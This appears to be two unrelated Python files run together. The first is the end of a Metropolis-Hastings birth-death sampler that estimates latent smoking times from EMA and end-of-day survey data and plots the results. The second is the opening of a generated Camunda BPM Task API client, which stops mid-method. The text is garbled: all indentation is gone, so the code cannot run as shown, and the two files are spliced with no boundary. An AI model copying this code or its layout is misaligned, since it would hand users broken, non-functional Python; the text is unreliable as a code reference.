dict_latent_likelihood = copy.deepcopy(dict_smart_death_lik['latent'])
dict_mem_eodsurvey_likelihood = copy.deepcopy(dict_smart_death_lik['eodsurvey'])
dict_mem_selfreport_likelihood = copy.deepcopy(dict_smart_death_lik['selfreport'])
dict_mem_randomema_likelihood = copy.deepcopy(dict_smart_death_lik['randomema'])
all_participant_ids = dict_smart_death_lik['all_participant_ids']
all_days = dict_smart_death_lik['all_days']
curr_dict_latent_data = dict_smart_death_lik['curr_dict_latent_data']
dict_smart_death_pdf = {}
for current_participant in all_participant_ids:
current_dict_smart_death_pdf = {}
for current_day in all_days:
if len(dict_current_state[current_participant][current_day]['x'])==0:
current_element_wise_lik = np.array([])
current_pdf_smart_death = np.array([])
# Update dictionary for this day
current_grid, sets_along_current_grid = get_sets_along_grid_death(current_latent_data = dict_current_state[current_participant][current_day]['x'])
elif len(dict_current_state[current_participant][current_day]['x'])==1:
# Calculate likelihood of moving to new state (deleting the one existing point)
lik_latent = dict_latent_likelihood[current_participant][current_day]
lik_eodsurvey = dict_mem_eodsurvey_likelihood[current_participant][current_day]
lik_selfreport = dict_mem_selfreport_likelihood[current_participant][current_day]
lik_randomema = dict_mem_randomema_likelihood[current_participant][current_day]
current_element_wise_lik = lik_latent * lik_eodsurvey * lik_selfreport * lik_randomema
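# With exactly one existing point there is only one possible deletion, so the
# smart-death pmf is degenerate (probability 1) at that point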
current_pdf_smart_death = np.array([1])
# Update dictionary for this day
current_grid, sets_along_current_grid = get_sets_along_grid_death(current_latent_data = dict_current_state[current_participant][current_day]['x'])
else:
# Calculate smart death pdf
lik_latent = dict_latent_likelihood[current_participant][current_day]
lik_eodsurvey = dict_mem_eodsurvey_likelihood[current_participant][current_day]
lik_selfreport = dict_mem_selfreport_likelihood[current_participant][current_day]
lik_randomema = dict_mem_randomema_likelihood[current_participant][current_day]
current_element_wise_lik = lik_latent * lik_eodsurvey * lik_selfreport * lik_randomema
current_denominator_pdf_smart_death = np.sum(current_element_wise_lik)
current_pdf_smart_death = current_element_wise_lik/current_denominator_pdf_smart_death
# Update dictionary for this day
current_grid, sets_along_current_grid = get_sets_along_grid_death(current_latent_data = dict_current_state[current_participant][current_day]['x'])
current_dict_smart_death_pdf.update({current_day:{'grid':current_grid,
'proposed_latent_smoking_times':sets_along_current_grid,
'pdf_smart_death':current_pdf_smart_death,
'lik_smart_death':current_element_wise_lik}})
# Update dictionary for this person
dict_smart_death_pdf.update({current_participant:current_dict_smart_death_pdf})
dict_all = {'dict_smart_death_pdf':dict_smart_death_pdf,
'all_participant_ids':all_participant_ids,
'all_days':all_days}
return dict_all
# %%
if __name__ == '__main__':
exec(open('../../env_vars.py').read())
dir_picklejar = os.environ['dir_picklejar']
filename = os.path.join(os.path.realpath(dir_picklejar), 'data_day_limits')
with open(filename, 'rb') as infile:
    data_day_limits = pickle.load(infile)
filename = os.path.join(os.path.realpath(dir_picklejar), 'init_latent_data_small')
with open(filename, 'rb') as infile:
    init_dict_latent_data = pickle.load(infile)  # Initialization of the latent smoking times
filename = os.path.join(os.path.realpath(dir_picklejar), 'observed_dict_eod_survey')
with open(filename, 'rb') as infile:
    init_dict_observed_eod_survey = pickle.load(infile)
filename = os.path.join(os.path.realpath(dir_picklejar), 'observed_dict_all_ema')
with open(filename, 'rb') as infile:
    init_dict_observed_ema = pickle.load(infile)
# %%
# Enumerate all unique participant IDs and study days
# (set use_this_participant/use_this_day to restrict the run to a single
# participant-day, e.g., all_participant_ids = [use_this_participant])
use_this_participant = None
use_this_day = None
all_participant_ids = data_day_limits['participant_id'].unique()
all_days = data_day_limits['study_day'].unique()
# %%
all_iter_dict_mh_ratio = {}
total_iter = 10
for current_iter in np.arange(total_iter):
# What is the likelihood of the current state?
current_state = get_for_all_current_state_lik(all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = init_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
select_combo = np.random.binomial(n=1, p=0.5, size=1)
select_combo = select_combo[0] * 1.0  # cast the 0/1 draw to float
# -------------------------------------------------------------------------
# Choose a smart birth but dumb death combo
# -------------------------------------------------------------------------
if select_combo == 1:
select_move = np.random.binomial(n=1, p=0.5, size=1)
select_move = select_move[0] * 1.0
#######################################################################
# if select_move==1, propose to add a point
# smart birth pdf will be used as the proposal distribution
#######################################################################
if select_move == 1:
# Calculate likelihood for each point on the grid
smart_birth_lik = get_for_all_smart_birth_lik(use_increment = 1/60,
all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = init_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
# Complete calculation of smart birth pdf
dict_smart_birth_pdf = get_for_all_smart_birth_pdf(dict_smart_birth_lik = smart_birth_lik, dict_current_state = current_state)
tmp_dict_latent_data = copy.deepcopy(init_dict_latent_data)
dict_mh_ratio = {}
for current_participant in all_participant_ids:
current_dict_mh_ratio = {}
for current_day in all_days:
arr_probs = dict_smart_birth_pdf['dict_smart_birth_pdf'][current_participant][current_day]['pdf_smart_birth']
grid_size = len(arr_probs)
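# Sample one grid index from the smart-birth proposal pmf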
selected_idx = np.random.choice(a = np.arange(grid_size), size=1, replace = True, p = arr_probs)
selected_idx = selected_idx[0]
proposed_point = dict_smart_birth_pdf['dict_smart_birth_pdf'][current_participant][current_day]['grid'][selected_idx]
proposed_set = dict_smart_birth_pdf['dict_smart_birth_pdf'][current_participant][current_day]['proposed_latent_smoking_times'][selected_idx]
tmp_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_set
tmp_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_set))
q_xprime_given_x = dict_smart_birth_pdf['dict_smart_birth_pdf'][current_participant][current_day]['pdf_smart_birth'][selected_idx]
q_x_given_xprime = 1/len(proposed_set) # Note that proposed_set is an array that will always be AT LEAST length 1
current_dict_mh_ratio.update({current_day:{'select_combo':select_combo,
'select_move':select_move,
'q_xprime_given_x':q_xprime_given_x,
'q_x_given_xprime':q_x_given_xprime,
'proposed_point':proposed_point}})
# Update dictionary for this person
dict_mh_ratio.update({current_participant:current_dict_mh_ratio})
# What is the likelihood at the proposed state?
proposed_state = get_for_all_current_state_lik(all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = tmp_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
new_dict_latent_data = copy.deepcopy(init_dict_latent_data)
for current_participant in all_participant_ids:
for current_day in all_days:
pi_x = current_state[current_participant][current_day]['pi_x']
pi_xprime = proposed_state[current_participant][current_day]['pi_x']
q_xprime_given_x = dict_mh_ratio[current_participant][current_day]['q_xprime_given_x']
q_x_given_xprime = dict_mh_ratio[current_participant][current_day]['q_x_given_xprime']
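# Metropolis-Hastings acceptance for this birth move:
# alpha = min(1, [pi(x') * q(x | x')] / [pi(x) * q(x' | x)]),
# where pi is the (unnormalized) target and q the proposal density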
mh_ratio = (pi_xprime / pi_x) * (q_x_given_xprime / q_xprime_given_x)
acceptance_prob = np.min([1.0, mh_ratio])
decision = np.random.binomial(n=1, p=acceptance_prob, size=1)
decision = decision[0]
dict_mh_ratio[current_participant][current_day]['mh_ratio'] = mh_ratio
dict_mh_ratio[current_participant][current_day]['acceptance_prob'] = acceptance_prob
dict_mh_ratio[current_participant][current_day]['decision'] = decision * 1.0
dict_mh_ratio[current_participant][current_day]['pi_x'] = pi_x
dict_mh_ratio[current_participant][current_day]['pi_xprime'] = pi_xprime
dict_mh_ratio[current_participant][current_day]['x'] = new_dict_latent_data[current_participant][current_day]['hours_since_start_day']
dict_mh_ratio[current_participant][current_day]['xprime'] = proposed_state[current_participant][current_day]['x']
if decision == 1:
# We accept the proposal and update the latent smoking times accordingly
new_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_state[current_participant][current_day]['x']
new_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_state[current_participant][current_day]['x']))
#######################################################################
# if select_move==0, propose to delete a point
# dumb death pdf will be used as the proposal distribution
#######################################################################
else:
tmp_dict_latent_data = copy.deepcopy(init_dict_latent_data)
dict_mh_ratio = {}
for current_participant in all_participant_ids:
current_dict_mh_ratio = {}
for current_day in all_days:
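# Note: this dumb-death branch assumes at least one latent point exists on this
# participant-day (grid_size >= 1); otherwise 1/grid_size below would divide by zero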
grid_size = len(current_state[current_participant][current_day]['x'])
arr_probs = np.repeat(1/grid_size, grid_size)
selected_idx = np.random.choice(a = np.arange(grid_size), size=1, replace = True, p = arr_probs)
selected_idx = selected_idx[0]
proposed_point = current_state[current_participant][current_day]['x'][selected_idx]
proposed_set = np.delete(arr = current_state[current_participant][current_day]['x'], obj = selected_idx)
tmp_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_set
tmp_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_set))
# Finally, collect results
q_xprime_given_x = 1/grid_size
q_x_given_xprime = -99 # Placeholder value; replaced at a later step below
current_dict_mh_ratio.update({current_day:{'select_combo':select_combo,
'select_move':select_move,
'q_xprime_given_x':q_xprime_given_x,
'q_x_given_xprime':q_x_given_xprime,
'proposed_point':proposed_point}})
# Update dictionary for this person
dict_mh_ratio.update({current_participant:current_dict_mh_ratio})
# What is the likelihood at the proposed state?
proposed_state = get_for_all_current_state_lik(all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = tmp_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
# Calculate likelihood for each point on the grid
# Note the use of tmp_dict_latent_data
smart_birth_lik = get_for_all_smart_birth_lik(use_increment = 1/60,
all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = tmp_dict_latent_data, # note this one; this is the configuration of points after proposed deletion
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
# Complete calculation of smart birth pdf
dict_smart_birth_pdf = get_for_all_smart_birth_pdf(dict_smart_birth_lik = smart_birth_lik, dict_current_state = proposed_state)
# Now, calculate q_x_given_xprime
for current_participant in all_participant_ids:
for current_day in all_days:
this_point = dict_mh_ratio[current_participant][current_day]['proposed_point']
all_possible_points = dict_smart_birth_pdf['dict_smart_birth_pdf'][current_participant][current_day]['grid']
this_idx = np.max(np.where(this_point - all_possible_points > 0)) # Index of the closest grid point strictly before this_point (assumes one exists)
dict_mh_ratio[current_participant][current_day]['q_x_given_xprime'] = dict_smart_birth_pdf['dict_smart_birth_pdf'][current_participant][current_day]['pdf_smart_birth'][this_idx]
new_dict_latent_data = copy.deepcopy(init_dict_latent_data)
for current_participant in all_participant_ids:
for current_day in all_days:
pi_x = current_state[current_participant][current_day]['pi_x']
pi_xprime = proposed_state[current_participant][current_day]['pi_x']
q_xprime_given_x = dict_mh_ratio[current_participant][current_day]['q_xprime_given_x']
q_x_given_xprime = dict_mh_ratio[current_participant][current_day]['q_x_given_xprime']
mh_ratio = (pi_xprime / pi_x) * (q_x_given_xprime / q_xprime_given_x)
acceptance_prob = np.min([1.0, mh_ratio])
decision = np.random.binomial(n=1, p=acceptance_prob, size=1)
decision = decision[0]
dict_mh_ratio[current_participant][current_day]['mh_ratio'] = mh_ratio
dict_mh_ratio[current_participant][current_day]['acceptance_prob'] = acceptance_prob
dict_mh_ratio[current_participant][current_day]['decision'] = decision * 1.0
dict_mh_ratio[current_participant][current_day]['pi_x'] = pi_x
dict_mh_ratio[current_participant][current_day]['pi_xprime'] = pi_xprime
dict_mh_ratio[current_participant][current_day]['x'] = new_dict_latent_data[current_participant][current_day]['hours_since_start_day']
dict_mh_ratio[current_participant][current_day]['xprime'] = proposed_state[current_participant][current_day]['x']
if decision == 1:
# we accept the proposal and update the latent smoking times accordingly
new_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_state[current_participant][current_day]['x']
new_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_state[current_participant][current_day]['x']))
# -------------------------------------------------------------------------
# Choose a smart death but dumb birth combo
# -------------------------------------------------------------------------
else:
select_move = np.random.binomial(n=1, p=0.5, size=1)
select_move = select_move[0] * 1.0
#######################################################################
# if select_move==1, propose to delete a point
# smart death pdf will be used as the proposal distribution
#######################################################################
if select_move == 1:
smart_death_lik = get_for_all_smart_death_lik(all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = init_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.9, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.9, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
dict_smart_death_pdf = get_for_all_smart_death_pdf(dict_smart_death_lik = smart_death_lik, dict_current_state = current_state)
# This is simply a placeholder dictionary for holding the proposed new configuration of points
tmp_dict_latent_data = copy.deepcopy(init_dict_latent_data)
dict_mh_ratio = {}
for current_participant in all_participant_ids:
current_dict_mh_ratio = {}
for current_day in all_days:
arr_probs = dict_smart_death_pdf['dict_smart_death_pdf'][current_participant][current_day]['pdf_smart_death']
grid_size = len(arr_probs)
selected_idx = np.random.choice(a = np.arange(grid_size), size=1, replace = True, p = arr_probs)
selected_idx = selected_idx[0]
proposed_point = dict_smart_death_pdf['dict_smart_death_pdf'][current_participant][current_day]['grid'][selected_idx]
proposed_set = dict_smart_death_pdf['dict_smart_death_pdf'][current_participant][current_day]['proposed_latent_smoking_times'][selected_idx]
tmp_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_set
tmp_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_set))
q_xprime_given_x = dict_smart_death_pdf['dict_smart_death_pdf'][current_participant][current_day]['pdf_smart_death'][selected_idx]
# Now, prepare to calculate q_x_given_xprime
tmp_grid_dumb_birth = construct_grid(increment=1/60, day_length=tmp_dict_latent_data[current_participant][current_day]['day_length'])
# We should not propose to birth points that already exist
# Note that the points within proposed_set come AFTER deletion of a point
grid_dumb_birth = np.setdiff1d(ar1 = tmp_grid_dumb_birth, ar2 = proposed_set)
q_x_given_xprime = 1/len(grid_dumb_birth)
current_dict_mh_ratio.update({current_day:{'select_combo':select_combo,
'select_move':select_move,
'q_xprime_given_x':q_xprime_given_x,
'q_x_given_xprime':q_x_given_xprime,
'proposed_point':proposed_point}})
# Update dictionary for this person
dict_mh_ratio.update({current_participant:current_dict_mh_ratio})
# What is the likelihood at the proposed state?
proposed_state = get_for_all_current_state_lik(all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = tmp_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
# Create a placeholder dictionary
new_dict_latent_data = copy.deepcopy(init_dict_latent_data)
for current_participant in all_participant_ids:
for current_day in all_days:
pi_x = current_state[current_participant][current_day]['pi_x']
pi_xprime = proposed_state[current_participant][current_day]['pi_x']
q_xprime_given_x = dict_mh_ratio[current_participant][current_day]['q_xprime_given_x']
q_x_given_xprime = dict_mh_ratio[current_participant][current_day]['q_x_given_xprime']
mh_ratio = (pi_xprime / pi_x) * (q_x_given_xprime / q_xprime_given_x)
acceptance_prob = np.min([1.0, mh_ratio])
decision = np.random.binomial(n=1, p=acceptance_prob, size=1)
decision = decision[0]*1.0
dict_mh_ratio[current_participant][current_day]['mh_ratio'] = mh_ratio
dict_mh_ratio[current_participant][current_day]['acceptance_prob'] = acceptance_prob
dict_mh_ratio[current_participant][current_day]['decision'] = decision
dict_mh_ratio[current_participant][current_day]['pi_x'] = pi_x
dict_mh_ratio[current_participant][current_day]['pi_xprime'] = pi_xprime
dict_mh_ratio[current_participant][current_day]['x'] = new_dict_latent_data[current_participant][current_day]['hours_since_start_day']
dict_mh_ratio[current_participant][current_day]['xprime'] = proposed_state[current_participant][current_day]['x']
if decision == 1:
# if decision==1, we accept the proposal and update the latent smoking times accordingly
new_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_state[current_participant][current_day]['x']
new_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_state[current_participant][current_day]['x']))
#######################################################################
# if select_move==0, propose to add a point
# dumb birth pdf will be used as the proposal distribution
#######################################################################
else:
dict_mh_ratio = {}
# This is simply a placeholder dictionary
tmp_dict_latent_data = copy.deepcopy(init_dict_latent_data)
for current_participant in all_participant_ids:
current_dict_mh_ratio = {}
for current_day in all_days:
tmp_grid_dumb_birth = construct_grid(increment=1/60, day_length=tmp_dict_latent_data[current_participant][current_day]['day_length'])
existing_points = tmp_dict_latent_data[current_participant][current_day]['hours_since_start_day']
# We should not propose to add existing points
grid_dumb_birth = np.setdiff1d(ar1 = tmp_grid_dumb_birth, ar2 = existing_points)
arr_probs = np.repeat(1/len(grid_dumb_birth), len(grid_dumb_birth))
selected_idx = np.random.choice(a = np.arange(len(grid_dumb_birth)), size=1, replace = True, p = arr_probs)
selected_idx = selected_idx[0]
proposed_point = grid_dumb_birth[selected_idx]
proposed_set = np.sort(np.append(existing_points, proposed_point))
tmp_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_set
tmp_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_set))
q_xprime_given_x = 1/len(grid_dumb_birth)
q_x_given_xprime = -99 # Placeholder value; replaced at a later step below
current_dict_mh_ratio.update({current_day:{'select_combo':select_combo,
'select_move':select_move,
'q_xprime_given_x':q_xprime_given_x,
'q_x_given_xprime':q_x_given_xprime,
'proposed_point':proposed_point}})
# Update dictionary for this person
dict_mh_ratio.update({current_participant:current_dict_mh_ratio})
# What is the likelihood at the proposed state?
proposed_state = get_for_all_current_state_lik(all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = tmp_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
smart_death_lik = get_for_all_smart_death_lik(all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = tmp_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.9, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.9, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
dict_smart_death_pdf = get_for_all_smart_death_pdf(dict_smart_death_lik = smart_death_lik, dict_current_state = proposed_state)
for current_participant in all_participant_ids:
for current_day in all_days:
this_point = dict_mh_ratio[current_participant][current_day]['proposed_point']
this_idx = np.where(proposed_state[current_participant][current_day]['x'] == this_point)
this_idx = this_idx[0][0]
dict_mh_ratio[current_participant][current_day]['q_x_given_xprime'] = dict_smart_death_pdf['dict_smart_death_pdf'][current_participant][current_day]['pdf_smart_death'][this_idx]
new_dict_latent_data = copy.deepcopy(init_dict_latent_data)
for current_participant in all_participant_ids:
for current_day in all_days:
pi_x = current_state[current_participant][current_day]['pi_x']
pi_xprime = proposed_state[current_participant][current_day]['pi_x']
q_xprime_given_x = dict_mh_ratio[current_participant][current_day]['q_xprime_given_x']
q_x_given_xprime = dict_mh_ratio[current_participant][current_day]['q_x_given_xprime']
mh_ratio = (pi_xprime / pi_x) * (q_x_given_xprime / q_xprime_given_x)
acceptance_prob = np.min([1.0, mh_ratio])
decision = np.random.binomial(n=1, p=acceptance_prob, size=1)
decision = decision[0]
dict_mh_ratio[current_participant][current_day]['mh_ratio'] = mh_ratio
dict_mh_ratio[current_participant][current_day]['acceptance_prob'] = acceptance_prob
dict_mh_ratio[current_participant][current_day]['decision'] = decision * 1.0
dict_mh_ratio[current_participant][current_day]['x'] = new_dict_latent_data[current_participant][current_day]['hours_since_start_day']
dict_mh_ratio[current_participant][current_day]['xprime'] = proposed_state[current_participant][current_day]['x']
if decision == 1:
# we accept the proposal and update the latent smoking times accordingly
new_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_state[current_participant][current_day]['x']
new_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_state[current_participant][current_day]['x']))
# END OF CURRENT ITERATION
# Note: latent data will be updated per iteration for all participant days
# Store those updates so that we can see how the configuration changes with each pass
all_iter_dict_mh_ratio.update({current_iter:dict_mh_ratio})
# The final step: specify the latent smoking times we will work with at the beginning of the next iteration
init_dict_latent_data = copy.deepcopy(new_dict_latent_data)
# %%
# Plot an example
current_participant = all_participant_ids[0] #None
current_day = all_days[0] #None
for current_iter in np.arange(total_iter):
print(all_iter_dict_mh_ratio[current_iter][current_participant][current_day]['x'])
# %%
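# Empirical acceptance rate for this participant-day across iterations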
total_accept = 0
for current_iter in np.arange(total_iter):
total_accept += all_iter_dict_mh_ratio[current_iter][current_participant][current_day]['decision']
print(total_accept/total_iter)
# %%
for current_iter in np.arange(total_iter):
current_latent_smoking_times = all_iter_dict_mh_ratio[current_iter][current_participant][current_day]['x']
# Preparation for plotting observed measurements -- end of day survey
any_eod_survey = init_dict_observed_eod_survey[current_participant][current_day]['assessment_begin']
current_checked_boxes_eod_survey = init_dict_observed_eod_survey[current_participant][current_day]['ticked_box_scaled']
# Preparation for plotting observed measurements -- ema
if len(init_dict_observed_ema[current_participant][current_day]['assessment_type'])>0:
idx_selfreport = np.where(init_dict_observed_ema[current_participant][current_day]['assessment_type']=='selfreport')
idx_random_ema = np.where(init_dict_observed_ema[current_participant][current_day]['assessment_type']=='random_ema')
current_selfreport_ema = init_dict_observed_ema[current_participant][current_day]['assessment_begin'][idx_selfreport]
current_random_ema = init_dict_observed_ema[current_participant][current_day]['assessment_begin'][idx_random_ema]
current_random_ema_responses = init_dict_observed_ema[current_participant][current_day]['smoke'][idx_random_ema]
else:
current_selfreport_ema = np.array([])
current_random_ema = np.array([])
current_random_ema_responses = np.array([])
# Show plot
current_day_length = np.max(init_dict_latent_data[current_participant][current_day]['day_length'])
plt.xticks(np.arange(0, current_day_length+1, 1.0))
plt.yticks(np.arange(0,1.1,0.1))
plt.xlim(-0.20,current_day_length+1.5)
if len(current_latent_smoking_times)>0:
plt.scatter(current_latent_smoking_times, np.repeat(-0.07, len(current_latent_smoking_times)), c = 'black', s=35, marker = 'o', label='Current Latent Smoking Times')
if len(current_selfreport_ema)>0:
plt.scatter(current_selfreport_ema, np.repeat(-0.18, len(current_selfreport_ema)), s=30, marker = '^', c = 'orange', label='Self-Report EMA')
if len(current_random_ema)>0:
plt.scatter(current_random_ema, np.repeat(-0.18, len(current_random_ema)), s=30, marker = '^', c = 'blue', label='Random EMA')
for idx in range(0, len(current_random_ema)):
plt.text(current_random_ema[idx], -0.28, current_random_ema_responses[idx], ha = 'center')
if len(any_eod_survey) > 0 and len(current_checked_boxes_eod_survey)==0:
plt.text(0,-0.35,"End of Day Survey Completed but No Boxes Checked", ha = 'left')
elif len(any_eod_survey)==0:
plt.text(0,-0.35,"End of Day Survey Not Completed", ha = 'left')
else:
pass
if len(current_checked_boxes_eod_survey)>0:
list_seg = []
for idx in range(0, len(current_checked_boxes_eod_survey)):
lower_lim = current_checked_boxes_eod_survey[idx]
upper_lim = lower_lim + 1
plt.scatter(lower_lim, -.13, marker = '|', s=30, c='g')
plt.scatter(upper_lim, -.13, marker = '|', s=30, c='g')
list_seg.append((lower_lim, upper_lim))
list_seg.append((-.13,-.13))
list_seg.append('g')
plt.plot(*list_seg)
plt.xlabel('Hours Elapsed Since Start of Day')
plt.ylabel('')
plt.yticks([])
plt.ylim(bottom=-0.40, top=0.10)
plt.text(current_day_length, 0.06, 'Iteration # {}'.format(current_iter), ha = 'right')
plt.legend(loc='upper left', prop={'size': 9})
plt.savefig(os.path.join(os.path.realpath(dir_picklejar), 'plot_current_smoking_times', 'current_smoking_times_{}_{}_iter_{}.jpg'.format(current_participant, current_day, current_iter)))
plt.clf()
# %%
filename = os.path.join(os.path.realpath(dir_picklejar), 'plot_current_smoking_times', 'all_iter_dict_mh_ratio')
outfile = open(filename, 'wb')
pickle.dump(all_iter_dict_mh_ratio, outfile)
outfile.close()
# %%
# coding: utf-8
# Source: openapi-python-client/openapi_client/api/task_api.py (yanavasileva/camunda-bpm-examples, Apache-2.0)
"""
Camunda BPM REST API
OpenApi Spec for Camunda BPM REST API. # noqa: E501
The version of the OpenAPI document: 7.13.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from openapi_client.api_client import ApiClient
from openapi_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class TaskApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
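# Example usage (a sketch; the host URL, task id, and user id are hypothetical):
#   from openapi_client import ApiClient, Configuration
#   from openapi_client.models import UserIdDto
#   configuration = Configuration(host="http://localhost:8080/engine-rest")
#   task_api = TaskApi(ApiClient(configuration))
#   task_api.claim("aTaskId", user_id_dto=UserIdDto(user_id="demo"))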
def claim(self, id, **kwargs): # noqa: E501
"""claim # noqa: E501
Claims a task for a specific user. **Note:** The difference with the [Set Assignee](https://docs.camunda.org/manual/7.13/reference/rest/task/post-assignee/) method is that here a check is performed to see if the task already has a user assigned to it. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.claim(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to claim. (required)
:param UserIdDto user_id_dto: Provide the id of the user that claims the task.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.claim_with_http_info(id, **kwargs) # noqa: E501
def claim_with_http_info(self, id, **kwargs): # noqa: E501
"""claim # noqa: E501
